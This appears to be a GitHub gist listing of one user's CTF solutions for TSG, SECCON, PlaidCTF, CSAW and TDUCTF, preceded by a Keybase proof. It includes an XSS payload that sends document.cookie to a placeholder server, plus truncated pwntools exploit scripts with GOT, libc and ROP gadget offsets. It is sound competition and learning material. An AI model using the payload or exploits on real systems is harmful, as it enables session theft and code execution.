Skip to content

Instantly share code, notes, and snippets.

View keybase.md

Keybase proof

I hereby claim:

  • I am rekkusu on github.
  • I am xrekkusu (https://keybase.io/xrekkusu) on keybase.
  • I have a public key ASDikKa6pgDX2d4GPEgqRbS4aQZnkti0ROig4psGPje8bAo

To claim this, I am signing this object:

@rekkusu
rekkusu / getflag.html
Created May 5, 2019
TSG CTF 2019 / BAD NONCE 1 & 2
View getflag.html
<script>
fetch('/nonce').then(r => r.text()).then(nonce => {
document.write('<iframe src="http://35.187.214.138:10023/?q=<script nonce='+nonce+'>location.href=\'//[server]/flag?f=\'%2Bdocument.cookie\x3c\x2fscript>"></iframe>');
});
</script>
@rekkusu
rekkusu / chat.py
Last active Dec 12, 2016
[SECCON 2016 Online] chat 500
View chat.py
from pwn import *
import string
strcmp_got = 0x603050
free_libc = 0x222c40
free_got = 0x603018
strchr_libc = 0x86d40
strchr_got = 0x603038
#system_libc = 0x46590
system_libc = 0xe5765 # One gadget RCE
@rekkusu
rekkusu / exploit.py
Created Sep 21, 2016
PlaidCTF 2015 - tp
View exploit.py
from pwn import *
# local libc
libc_data = 0x1bb000
libc_main_arena = libc_data + 0x203760
libc_environ = libc_data + 0x2064a0
libc_gadget = {
'poprdi': 0x22b1a,
'poprsi': 0x24805,
'poprdx': 0x1b8e,
@rekkusu
rekkusu / SECCON2015 final 問題解説メモ
Created Jan 31, 2016
tessyさんが解説したスライドの内容のメモ
View SECCON2015 final 問題解説メモ
[intercollege]
1. WebServiceX
記事投稿掲示板
SQLi
パス丸見え
削除キーを抜き取り記事を削除する
2. SECCON競馬
node.jsで稼働するサーバ
各所にあるSQLiを攻撃
@rekkusu
rekkusu / rhinoxorus.py
Created Sep 20, 2015
[CSAW CTF 2015] Exploit 500 rhinoxorus
View rhinoxorus.py
from pwn import *
ret_addr = 0x8056afa
pop2ret = 0x80578fa
leaveret = 0x804889f
password = 0x805f0c0
sock_send = 0x804884b
s = remote('54.152.37.20', 24242)
payload = [
@rekkusu
rekkusu / autobots.py
Created Sep 20, 2015
[CSAW CTF 2015] Exploit 350 autobots
View autobots.py
from pwn import *
import re
import os
import time
import sys
REMOTE = len(sys.argv) >= 2 and sys.argv[1] == 'r'
csu_pop = 0x4008ca
csu_call = 0x4008b0
@rekkusu
rekkusu / 0_reuse_code.js
Last active Sep 2, 2015
Here are some things you can do with Gists in GistBox.
View 0_reuse_code.js
// Use Gists to store code you would like to remember later on
console.log(window); // log the "window" object to the console
@rekkusu
rekkusu / myrsa.py
Created Aug 31, 2015
TDUCTF 2015 Crypto500 My RSA
View myrsa.py
A = 2**127 - 1
B = 2**521 - 1
M = 2**607 - 1
e = 2 ** 16 + 1
N = 63818680202675589216815967315756339566489246779116223051722243409259352306082269405584940079271925323037734694881017657210693291225811959344097136283943773119253977386753351100049200282621303479907450098708525270143513533970091975470643256818850535284677109438825447301648598261836252545636152169068763895406856318437232759172916712871952129664784095465920918889209
# Mathematica
# X = Mod[FindInstance[Reduce[A*x^2 + B*x - NN + k*M == 0, {x, k}, Integers], {x, k}][[1]][[1]][[2]], M]
X = 191381205906541365810282593776863206661156657204872893015293939948869850881931905283828875884014270971209197231695869794928684848246961454267088835714426435068255775651115299873104893
@rekkusu
rekkusu / charlotte.py
Last active Aug 31, 2015
TDUCTF 2015 Pwnable writeup
View charlotte.py
from pwn import *
from libformatstr import FormatStr
import time
s = remote('crackme.sakura.tductf.org', 10773)
read_secret = 0x0804875d
strlen_got = 0x8049138
exit_got = 0x804912c
puts_plt = 0x8048580
You can’t perform that action at this time.